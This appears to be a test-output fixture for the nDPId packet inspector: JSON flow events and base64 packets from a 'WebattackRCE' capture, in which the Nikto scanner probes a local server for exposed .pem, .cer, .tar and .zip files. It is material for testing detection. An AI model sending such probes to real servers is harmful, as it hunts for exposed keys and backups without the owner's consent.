+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1576420276876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276876,"pkt":"AAAAAAAAAAAAAAAACABFAADCnWxAAEAGnsd\/AAABfwAAAcKUH5Co\/aUqs\/1iGoAYAED+tgAAAQEICp1m+7SdZvu0R0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1576420276877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276877,"pkt":"AAAAAAAAAAAAAAAACABFAADAt7lAAEAGhHx\/AAABfwAAAcKWH5CQPI\/1lm3rwoAYAED+tAAAAQEICp1m+7WdZvu1R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1576420276879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276879,"pkt":"AAAAAAAAAAAAAAAACABFAADAhf9AAEAGtjZ\/AAABfwAAAcKYH5Cnmb2\/tsRlFIAYAED+tAAAAQEICp1m+7edZvu2R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1576420276881,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276881,"pkt":"AAAAAAAAAAAAAAAACABFAADADYtAAEAGLqt\/AAABfwAAAcKaH5CHzTXOE9kNb4AYAED+tAAAAQEICp1m+7mdZvu5R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1576420276884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276884,"pkt":"AAAAAAAAAAAAAAAACABFAADAT5pAAEAG7Jt\/AAABfwAAAcKcH5DBOXfeD5T\/lYAYAED+tAAAAQEICp1m+7udZvu7R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1576420276885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276885,"pkt":"AAAAAAAAAAAAAAAACABFAADFQQ5AAEAG+yJ\/AAABfwAAAcKeH5AdhXlKg0oevYAYAED+uQAAAQEICp1m+72dZvu9R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1576420276886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276886,"pkt":"AAAAAAAAAAAAAAAACABFAADFWJBAAEAG46B\/AAABfwAAAcKgH5CSJ2DMWYYFgIAYAED+uQAAAQEICp1m+76dZvu+R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1576420276888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276888,"pkt":"AAAAAAAAAAAAAAAACABFAAC95a1AAEAGVot\/AAABfwAAAcKiH5DfWN3u+DsBkYAYAED+sQAAAQEICp1m+8CdZvvAR0VUIC8wLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1576420276890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276890,"pkt":"AAAAAAAAAAAAAAAACABFAAC9vy5AAEAGfQp\/AAABfwAAAcKkH5Dme4drk\/tL44AYAED+sQAAAQEICp1m+8KdZvvCR0VUIC8wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1576420276891,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276891,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/ZdAAEAGPpl\/AAABfwAAAcKmH5DYD8XTrc+7CoAYAED+uQAAAQEICp1m+8OdZvvDR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1576420276893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276893,"pkt":"AAAAAAAAAAAAAAAACABFAADFI6xAAEAGGIV\/AAABfwAAAcKoH5Ar0hvuzfCq7oAYAED+uQAAAQEICp1m+8WdZvvFR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 